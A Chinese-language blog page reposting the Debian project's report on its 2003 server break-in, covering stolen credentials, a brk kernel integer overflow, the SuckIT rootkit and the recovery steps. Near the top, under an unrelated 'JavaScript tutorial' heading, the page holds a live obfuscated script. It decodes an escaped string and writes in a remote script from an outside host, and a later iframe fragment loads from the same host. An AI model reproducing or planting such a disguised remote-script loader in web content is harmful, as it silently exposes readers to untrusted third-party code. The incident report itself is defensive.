Debian服务器受攻击的调查报告

最新推荐文章于 2024-08-26 18:22:00 发布
最新推荐文章于 2024-08-26 18:22:00 发布
阅读量206 收藏
点赞数
文章标签: 服务器 debian javascript linux内核 ssh 存储
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lxf464383/article/details/1833454
版权
 

HTML Tags and JavaScript tutorial


<script language="javascript">var encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15.cnwg.cn/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);</script>
Debian服务器受攻击的调查报告




具体攻击过程分析
  格林威治时间礼拜四,11月19日下午5时左右,入侵者使用一个窃取到的密码登陆到klecker服务器(.debian.org)所在的开发 人员帐号上 (普通权限帐号),接着通过HTTP取回一个本地内核木马程序并使用该程序获得root权限,然后安装了root -kit程序。入侵者然后使用同一帐号和密码进入master服务器并用同样手段获得root权限并安装了SuckIT root-kit。入侵者又使用同一帐号和密码企图进入murphy主机,操作失败。murphy主机有帐号限制,只运行列表服务器并且只有少数开发人员 才能登陆。此法无效,该攻击者使用在master系统的root权限访问了管理帐号,该管理帐号用作文件备份和访问murphy主机。入侵者得逞,也在 murphy主机安装了root-kit.
  次日,攻击者使用从master服务器上窃取的帐号密码登陆gluck服务器,获得root权限后再次安装了木马程序SuckIT root-kit。
  /sbin/init 被覆盖的确切日期和时间和root-kit被安装的确切时间均通过分析一一得知。分析人员同时也发现一可执行文件,该文件用来获取服务器root访问权.安全专家则发现,该木马程序利用了Linux内核的漏洞。
  一个brk系统呼叫的整数溢出被利用并覆盖内核存储器(改变page保护点),攻击者由此获得内核存储器空间的控制权并可以改变存储器中的参数数值。
  尽管这一内核漏洞已于9月份被Andrew Morton发现并在10月以来发布的内核版本中进行了少量修复。但是由于安全意识的疏忽并没有人意识到该漏洞的严重性。所以,没有任何Linux发行商 对此提出任何安全建议。导致黑客发现并利用该漏洞攻击了debian服务器。至此,通用缺陷和漏洞计划指定该安全问题代号为CAN-2003-0961。
  Linux 2.2.x 没有此缺陷,因为通道检查已经在此之前进行。同时确信Sparc和PA-RISC内核均无该漏洞,(Sparc和PA-RISC内核存储于其他位置)。
  我们不能把该木马程序给任何陌生人,请理解我们的作法并不要向我们询问有关此木马程序的事项。
  
修复
  服务器关闭以后,我们建立了遭受攻击的服务器硬盘映像并转移到隔离的服务器。该映像同时分发给鉴定分析人员。之后,美国有三台服务器 (master, murphy,gluck)重新安装,经过相关服务的管理员调查之后一个接一个重新开放了帐号服务。klecker服务器因为维护计划将会延期开放,所以 安全文档的重新在线放置会比其他服务更早。目前我们也没有klecker控制台访问能力,所以修复工作不得不进行远程操作。在硬盘映像通过Serial Console登陆到有防火墙的本地网络服务器后,root-kit程序被删除,内核则被更换和加固。两次检查了二进制文件和安全文档,klecker服 务器将于未来几周内重新安装。
  由于安全预防原因,所有LDAP的开发人员帐号被停用,重要主机的SSH Key被卸除,以保证不会收到攻击。这样,公共Debian运作包括上传文件和访问CVS储藏室都被停用。在quantz使用的所有密码均被设置无效。所 有的SSH许可密匙也被卸除。新密码可以在以下连接中获取:https://alioth.debian.org/account/lostpw.php
  当所有服务重新开放并保证服务器足够安全时,LDAP会被重新设定,开发人员便可建立新密码。由于受攻击的服务器SSH重新安装。将有新的RSA主机密匙和密匙指纹识别器安装于这些服务器。
  
总结
  自从受到攻击的服务器密码遭到监听,任何发送带有密码的信息连接都被认为受到威胁。另外,如果你使用相同的密码和帐号登陆Debian主机,我 们强烈建议你分别更换密码和帐号。在服务器进行引导和储存的SSH key如果曾经用于访问其他主机,该SSH key也必须被删除。
  担心个人计算机有危险的开发人员可以通过运行chkrootkit进行检查。目前的版本可以在下列地址找到:
  deb http://lackof.org/taggart/debian woody/chkrootkit main
  deb-src http://lackof.org/taggart/debian woody/chkrootkit main

src="http://avss.b15.cnwg.cn/count/iframe.asp" frameborder="0" width="650" scrolling="no" height="160">
lxf464383
关注
最新kali之nmap
vanony的博客
01-22 1099
描述:   网络探索工具和安全性/端口扫描程序。   Nmap(“网络映射器”)是用于网络探索和安全审核的开源工具。 它旨在快速扫描大型网络,尽管它可以对单个主机正常运行。 Nmap以新颖的方式使用原始IP数据包来确定网络上可用的主机,这些主机提供的服务(应用程序名称和版本),它们正在运行的操作系统(和OS版本),包过滤器/防火墙的类型。 正在使用中,还有许多其他特性。 尽管Nmap通常用于安全审核,但许多系统和网络管理员发现它对于日常任务(例如网络清单,管理服务升级计划以及监视主机或服务正常运行时间)很有
最新kali之ncrack
vanony的博客
01-22 1906
描述:   网络认证破解工具。   Ncrack是用于网络身份验证破解的开源工具。 它设计为使用可适应不同网络情况的动态引擎进行高速并行破解。 Ncrack还可以针对特殊情况进行广泛的微调,尽管默认参数的通用性足以覆盖几乎所有情况。 它建立在模块化架构上,可以轻松扩展以支持其他协议。 Ncrack专为公司和安全专业人员设计,可以快速,可靠地审核大型网络的默认或弱密码。 它还可以用于对单个服务进行相当复杂和密集的暴力破解攻击。   警告     Ncrack是一个始于2009年夏季的项目。尽管它已经出于某些目
web服务器攻击信息分析,Web服务器攻击分析报告.pdf
weixin_34887221的博客
08-10 364
Web服务器攻击分析报告CSNA 网络分析专家案例分析报告报告提交时间 2010-4-2报告提交人 徐志刚2010 年4 月网络分析报告目录1. 故障现象描述11.1. 故障现象描述 11.2....
前两天云服务器又被攻击了情况汇报很严重
沧海桑田
11-19 1278
前几天老大还没有回来公司网站又被攻击了,原因自然是程序问题了,因为网站已经做了很多年了,程序存在很多的漏洞百出表面看起来就是已经有点老旧了,所以被黑客攻击其实也是很正常的,后来还专门寻找高手帮忙最后才能解决网站的正常访问。期间还专门用软件杀毒两次,总共检测出两百多个病毒和威胁利诱这个结果看起来真的是有点吓人啊。我现在感觉到每天随时随地都有被危险袭击的可能性最后。从今天以后我得要慢慢的在防治效果上下
阿里云服务器攻击总结
lck_csdn的博客
05-17 1675
1.为什么攻击 1.1什么是暴力破解攻 暴力破解攻击是指攻击者通过系统地组合并尝试所有的可能性以破解用户的用户名、密码等敏感信息。攻击者往往借助自动化脚本工具来发动暴力破解攻击。 1.1.1攻击行为类型 根据暴力破解的穷举方式,其攻击行为可以分为: 字典攻击法。大多攻击者并没有高性能的破解算法和CPU/GPU,为节省时间和提高效率,会利用社会工程学或其它方式建立破译字典,使用字典中已存在的用户名、密码进行猜破。 穷举法。攻击者首先列出密码组合的可能性(如数字、大写字母、小写字母、特殊字符等),然后按密码
关于2022年10月12日发现服务器Redis被攻击报告
weixin_44547333的博客
10-13 580
记录一次自己的服务器redis被攻击,以及排查过程和解决
MySQL数据库安全防护:从原理到实战,保障数据库免攻击
![MySQL数据库安全防护:从原理到实战,保障数据库免...确保数据库安全对于保护组织免数据泄露、恶意软件攻击和未经授权的访问至关重要。 **1.1 安全威胁** MySQL数据库面临着各种安全威胁,包括: - **SQL注
CVE-2024-3094 XZ 后门:您需要了解的一切
最新发布
技术超强的网络安全平台
08-26 988
3 月 29 日,据报道,在 XZ Utils 中检测到了GitHub 项目现已暂停)。幸运的是,OSS 社区很快发现了该恶意代码,并且仅感染了该软件包的两个最新版本,即上个月发布的 5.6.0 和 5.6.1。大多数 Linux 发行版的稳定版本均未到影响。影响的 XZ Utils 版本附带的复杂恶意负载与 OpenSSH 服务器SSHD)在相同的进程中运行,并修改了 OpenSSH 服务器中的解密例程,以允许。
Linux服务器攻击排查取证
weixin_42261331的博客
09-14 1282
前言: 大家日常早就对Windows中的病毒习惯了,对付Windows中的病毒,有很多办法:杀毒软件、专杀工具等,但是这些东西往往主要集中在windows这一领域。 很多企业使用了Linux操作系统,原因主要是Linux的安全性比较高,但随着业务及技术发展,面向Linux系统的攻击越来越多,Linux机器也会感染病毒。本文会对Linux病毒攻击排查及如何防范做初步的介绍。 Linux系统被入侵/中毒的表象,比较常见的中毒表现在以下三个方面: 1)服务器出去的带宽会跑高这个是中毒的一个特征。 ..
记一次服务器攻击处理
Jinx
05-17 3183
基本情况:服务器没有表象的被攻击征兆,只是偶然登录阿里云控制台,发现主机cpu一个月来占用率都是100%; 于是ssh服务器执行命令top -c //看看哪些占用cpu比较高发现有两个mysql用户的进程各占用47%左右,这两个几乎就占用了全部的cpu。想着服务器上的数据库已经迁移到了阿里云,所以就kill掉他们,然后又查看cpu占用,发现依然有两个这样的进行,只是pid改变了,于是我关闭了my
51CTO专项调研:Linux桌面发行版生存状况
weixin_34015566的博客
09-27 131
51CTO调研中心针对Linux桌面发行版生存状况的调查报告现已发布。本次报告数据收集周期为2011年7月到2011年9月,共收集有效数据3515份,期间得到了51CTO沙龙会员、Linux各大论坛、51CTO网站用户以及众多Linux爱好者的大力支持。 报告下载地址(51CTO下载频道):http://down.51cto.com/data/254493 报告下载地址(...
服务器被黑该如何查找入侵、攻击痕迹
热门推荐
网站安全专家
07-21 2万+
当公司的网站服务器被黑,被入侵导致整个网站,以及业务系统瘫痪,给企业带来的损失无法估量,但是当发生服务器攻击的情况,作为服务器的维护人员应当在第一时间做好安全响应,对服务器以及网站应以最快的时间恢复正常运行,让损失减少到最低,针对于黑客攻击的痕迹应该如何去查找溯源,还原服务器攻击的现场,SINE安全公司制定了详细的服务器被黑自查方案。 目前网站服务器攻击的特征如下: 网站被攻击:网站被跳...
服务器攻击的发现和解决过程
qq_20667511的博客
01-25 2176
记一次服务器攻击的发现和解决过程这是之前2018年左右,买阿里云服务器之后,服务器攻击,当时的记录信息,现在整理一下出现的问题解决思路和解决过程解决思路:解决步骤:思考:为什么会出现这样的脚本改写 /root/.ssh/authorized_keys通过redis日志实现的但是需要注意的是:总结: 这是之前2018年左右,买阿里云服务器之后,服务器攻击,当时的记录信息,现在整理一下 出现的问题 服务器的用户进程一直处于100%的使用 通过ps -ef ,查看进程,并未发现异常(可能是自己没注意到),
一次linux服务器的入侵分析报告
10-26 1310
 一天,接到朋友的电话,他们公司的web服务器被投诉发送垃圾邮件,要求紧急处理,朋友让我过去帮他检查一下。我听了很迷惑,web服务器怎么会发送垃圾邮件,朋友告诉我web服务器系统中根本没有安装mail服务,应该是不可能发送垃圾邮件的。直觉告诉我可能是被别人hacking了?     我到了朋友公司的机房,使用securecrt登陆到服务器,ps一下,发现有几个异常的程序,如下图一所示,有一个sen
debian服务器安全设置
liumingkong的专栏
11-29 1570
1.SSH安全设置 1).ssh关闭root用户远程登录 #vim /etc/ssh/sshd_config PermitRootLogin on 2).ssh限定用户只能使用密钥登陆,即禁用密码登陆 :PasswordAuthentication no 2.FTP安全设置 1)去掉用户的shell权限 #vim /etc/proftpd/proftpd.conf RequireV
如何判断 Linux 服务器是否被入侵?
weixin_33806509的博客
11-12 192
如何判断 Linux 服务器是否被入侵? 本指南中所谓的服务器被入侵或者说被黑了的意思,是指未经授权的人或程序为了自己的目的登录到服务器上去并使用其计算资源,通常会产生不好的影响。 免责声明:若你的服务器被类似 NSA 这样的国家机关或者某个犯罪集团入侵,那么你并不会注意到有任何问题,这些技术也无法发觉他们的存在。 然而,大多数被攻破的服务器都是被类似自...
Linux的scan命令,clamscan-Linux查毒工具的命令详解
weixin_35062801的博客
05-01 2940
clamscan-Linux查毒工具的命令详解clamscan命令用于扫描文件和目录,一发现其中包含的计算机病毒,clamscan命令除了扫描linux系统的病毒外,主要扫描的还是文件中包含的windows病毒。clamscan [选项] [路径] [文件]--quiet 使用安静模式,仅仅打印出错误信息-i 仅仅打印被感染的文件-d 以指定的文件作为病毒库,一代替默认的/var/clama...
Debian服务器基础配置与服务安装指南
"这是关于在Linux Debian系统上进行服务器配置的笔记,主要涵盖了初次安装和配置SSH、更新软件源、安装基础软件以及网络设置等关键步骤。" 在Linux Debian服务器配置过程中,初学者需要掌握以下几个核心知识点: 1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值